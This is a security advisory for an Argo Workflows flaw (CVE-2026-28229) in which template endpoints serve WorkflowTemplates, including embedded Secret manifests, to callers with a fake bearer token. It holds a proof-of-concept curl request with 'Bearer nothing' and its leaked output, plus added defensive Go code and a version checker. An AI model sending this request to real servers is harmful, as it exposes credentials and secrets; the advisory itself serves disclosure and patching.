GHSA-56PX-HM34-XQJ5
Vulnerability from github – Published: 2026-03-11 14:49 – Updated: 2026-03-11 20:43
Summary
Workflow template endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request carrying an arbitrary token such as Authorization: Bearer nothing can leak sensitive template content, including embedded Secret manifests.
Details
https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78
https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72
Informers use the server's REST config, so they read using the server's service account (SA) privileges rather than the caller's.
https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42
https://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46
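The root cause described above is an ordering problem: the handler returns data that the informer read with the server's service account before establishing who the caller is. The Go snippet below is an added example written for this page, not Argo's code or its fix. It sketches the defensive pattern with a constructed in-memory template cache, a constructed token store and hypothetical `getTemplate`/`newHandler` functions: resolve the bearer token to a principal, reject unknown or missing tokens with 401, check that the principal may read the requested namespace, and only then touch the privileged cache.

```go
package main

import (
	"encoding/json"
	"log"
	"net/http"
	"strings"
)

// workflowTemplate is a constructed, minimal stand-in for the real
// WorkflowTemplate object; only the fields the example needs.
type workflowTemplate struct {
	Name      string `json:"name"`
	Namespace string `json:"namespace"`
	Manifest  string `json:"manifest"`
}

// templateCache stands in for the informer cache. It was filled using the
// server's own service account, so it can see every template in the
// cluster. That is fine; serving it to an unchecked caller is not.
var templateCache = map[string]workflowTemplate{
	"argo/leak-workflow-template": {
		Name:      "leak-workflow-template",
		Namespace: "argo",
		Manifest:  "kind: Secret (constructed placeholder)",
	},
}

// principal is what the authenticator derives from a bearer token.
type principal struct {
	Name       string
	Namespaces map[string]bool // namespaces this principal may read templates in
}

// tokenStore is a constructed stand-in for real token validation
// (Kubernetes TokenReview, SSO, ...). Any token not listed here is unknown.
var tokenStore = map[string]*principal{
	"constructed-valid-token": {Name: "alice", Namespaces: map[string]bool{"argo": true}},
}

// authenticate maps the Authorization header to a principal, or nil when the
// header is missing, malformed, empty or carries an unknown token such as
// "nothing".
func authenticate(r *http.Request) *principal {
	const prefix = "Bearer "
	auth := r.Header.Get("Authorization")
	if !strings.HasPrefix(auth, prefix) {
		return nil
	}
	token := strings.TrimSpace(strings.TrimPrefix(auth, prefix))
	if token == "" {
		return nil
	}
	return tokenStore[token] // nil for unknown tokens
}

// authorize checks that the authenticated principal may read templates in ns.
func authorize(p *principal, ns string) bool {
	return p != nil && p.Namespaces[ns]
}

// getTemplate serves GET /api/v1/workflow-templates/{namespace}/{name}.
// Authentication and authorization run before the cache is touched, so an
// anonymous or unauthorized caller never reaches data that was read with the
// server's privileges.
func getTemplate(w http.ResponseWriter, r *http.Request) {
	p := authenticate(r)
	if p == nil {
		w.Header().Set("WWW-Authenticate", `Bearer realm="argo-server"`)
		http.Error(w, "unauthenticated", http.StatusUnauthorized)
		return
	}
	rest := strings.TrimPrefix(r.URL.Path, "/api/v1/workflow-templates/")
	parts := strings.Split(rest, "/")
	if len(parts) != 2 || parts[0] == "" || parts[1] == "" {
		http.NotFound(w, r)
		return
	}
	ns, name := parts[0], parts[1]
	if !authorize(p, ns) {
		http.Error(w, "forbidden", http.StatusForbidden)
		return
	}
	tmpl, ok := templateCache[ns+"/"+name]
	if !ok {
		http.NotFound(w, r)
		return
	}
	w.Header().Set("Content-Type", "application/json")
	if err := json.NewEncoder(w).Encode(tmpl); err != nil {
		log.Printf("encode: %v", err)
	}
}

// newHandler wires the route so that main and tests share the same mux.
func newHandler() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/v1/workflow-templates/", getTemplate)
	return mux
}

func main() {
	log.Fatal(http.ListenAndServe("127.0.0.1:2746", newHandler()))
}
```

The point of the design is that the cache can stay privileged: what must change is that no read is served until the caller's identity has been resolved and its namespace access checked. A real server would back `authenticate` with TokenReview or the SSO verifier and `authorize` with a SubjectAccessReview or an RBAC impersonation client, but the ordering is the same.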
PoC
1. Create template

```yml
apiVersion: argoproj.io/v1alpha1
kind: WorkflowTemplate
metadata:
  name: leak-workflow-template
  namespace: argo
spec:
  templates:
    - name: make-secret
      resource:
        action: create
        manifest: |
          apiVersion: v1
          kind: Secret
          metadata:
            name: leaked-secret
          type: Opaque
          data:
            password: c3VwZXJzZWNyZXQ=
```

Then apply that with kubectl apply -f poc.yml

2. Query Argo Server with a fake token
Result:

```cmd
> kubectl apply -f poc.yml
workflowtemplate.argoproj.io/leak-workflow-template created
> curl -sk -H "Authorization: Bearer nothing" \
  "https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template"
{"metadata":{"name":"leak-workflow-template","namespace":"argo","uid":"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c","resourceVersion":"867394","generation":1,"creationTimestamp":"REDACTED","annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"argoproj.io/v1alpha1\",\"kind\":\"WorkflowTemplate\",\"metadata\":{\"annotations\":{},\"name\":\"leak-workflow-template\",\"namespace\":\"argo\"},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n name: leaked-secret\\ntype: Opaque\\ndata:\\n password: c3VwZXJzZWNyZXQ=\\n\"}}]}}\n"},"managedFields":[{"manager":"kubectl-client-side-apply","operation":"Update","apiVersion":"argoproj.io/v1alpha1","time":"REDACTED","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:spec":{".":{},"f:templates":{}}}}]},"spec":{"templates":[{"name":"make-secret","inputs":{},"outputs":{},"metadata":{},"resource":{"action":"create","manifest":"apiVersion: v1\nkind: Secret\nmetadata:\n name: leaked-secret\ntype: Opaque\ndata:\n password: c3VwZXJzZWNyZXQ=\n"}}],"arguments":{}}}
```
Impact
Any client can leak WorkflowTemplate and ClusterWorkflowTemplate data, including secrets, artifact locations, service account usage, environment variables, and resource manifests.
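To turn the affected ranges in the advisory record that follows into a quick dependency check, here is an added Go example (not part of the advisory or of the project): it compares a module version against the two OSV ranges copied from the record (the v3 module before 3.7.11 and the v4 module before 4.0.2) and scans `go list -m all` style output for affected modules. `IsAffected`, `AffectedModules` and the sample module list in `main` are constructed for this example; pre-release versions are treated as sorting before the matching release, so 4.0.2-rc1 still counts as affected.

```go
package main

import (
	"bufio"
	"fmt"
	"strconv"
	"strings"
)

// osvRange mirrors one "ECOSYSTEM" range from the advisory's affected list:
// a version v is affected when introduced <= v < fixed.
type osvRange struct {
	module, introduced, fixed string
}

// Copied from the advisory record on this page.
var ghsa56pxRanges = []osvRange{
	{module: "github.com/argoproj/argo-workflows/v3", introduced: "0", fixed: "3.7.11"},
	{module: "github.com/argoproj/argo-workflows/v4", introduced: "0", fixed: "4.0.2"},
}

// version is a parsed semantic version; pre marks a pre-release (-rc1 etc.),
// which sorts before the corresponding release.
type version struct {
	nums [3]int
	pre  bool
}

// parseVersion accepts "v3.7.10", "3.7.10", "4.0.2-rc1" and the bare "0"
// used by OSV for "introduced". Build metadata after '+' is ignored.
func parseVersion(s string) (version, error) {
	var v version
	s = strings.TrimPrefix(s, "v")
	if i := strings.IndexAny(s, "-+"); i >= 0 {
		v.pre = s[i] == '-'
		s = s[:i]
	}
	parts := strings.Split(s, ".")
	if len(parts) > 3 {
		return v, fmt.Errorf("bad version %q", s)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("bad version %q", s)
		}
		v.nums[i] = n
	}
	return v, nil
}

// compareVersions returns -1, 0 or 1 in the usual ordering.
func compareVersions(a, b version) int {
	for i := range a.nums {
		if a.nums[i] != b.nums[i] {
			if a.nums[i] < b.nums[i] {
				return -1
			}
			return 1
		}
	}
	switch {
	case a.pre && !b.pre:
		return -1
	case !a.pre && b.pre:
		return 1
	}
	return 0
}

// IsAffected reports whether module@ver falls inside one of the ranges.
func IsAffected(ranges []osvRange, module, ver string) (bool, error) {
	v, err := parseVersion(ver)
	if err != nil {
		return false, err
	}
	for _, r := range ranges {
		if r.module != module {
			continue
		}
		lo, err := parseVersion(r.introduced)
		if err != nil {
			return false, err
		}
		hi, err := parseVersion(r.fixed)
		if err != nil {
			return false, err
		}
		if compareVersions(v, lo) >= 0 && compareVersions(v, hi) < 0 {
			return true, nil
		}
	}
	return false, nil
}

// AffectedModules scans `go list -m all` style output ("path version" per
// line) and returns the "path version" lines that match an affected range.
func AffectedModules(ranges []osvRange, goList string) ([]string, error) {
	var hits []string
	sc := bufio.NewScanner(strings.NewReader(goList))
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) < 2 {
			continue // main module line or blank line
		}
		hit, err := IsAffected(ranges, fields[0], fields[1])
		if err != nil {
			return nil, err
		}
		if hit {
			hits = append(hits, fields[0]+" "+fields[1])
		}
	}
	return hits, sc.Err()
}

func main() {
	// Constructed sample of `go list -m all` output.
	sample := "example.com/app\ngithub.com/argoproj/argo-workflows/v3 v3.7.10\n"
	hits, err := AffectedModules(ghsa56pxRanges, sample)
	fmt.Println(hits, err)
}
```

Note that the v3 and v4 module paths are separate packages in the record, so a 3.x version is only ever compared with the 3.7.11 bound and a 4.x version only with the 4.0.2 bound; feeding the real `go list -m all` output of a service into `AffectedModules` gives the same answer a scanner would derive from the OSV data.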
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.7.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v4"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28229"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T14:49:37Z",
"nvd_published_at": "2026-03-11T16:16:40Z",
"severity": "HIGH"
},
"details": "### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server\u2019s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n name: leak-workflow-template\n namespace: argo\nspec:\n templates:\n - name: make-secret\n resource:\n action: create\n manifest: |\n apiVersion: v1\n kind: Secret\n metadata:\n name: leaked-secret\n type: Opaque\n data:\n password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. 
Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n\u003e kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n\u003e curl -sk -H \"Authorization: Bearer nothing\" \\\n \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n name: leaked-secret\\ntype: Opaque\\ndata:\\n password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.",
"id": "GHSA-56px-hm34-xqj5",
"modified": "2026-03-11T20:43:29Z",
"published": "2026-03-11T14:49:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-56px-hm34-xqj5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28229"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/commit/34afaf9c0c36f1ba8645d483ea4752cfc4a391e8"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-workflows"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.11"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Unauthorized access to Argo Workflows Template"
}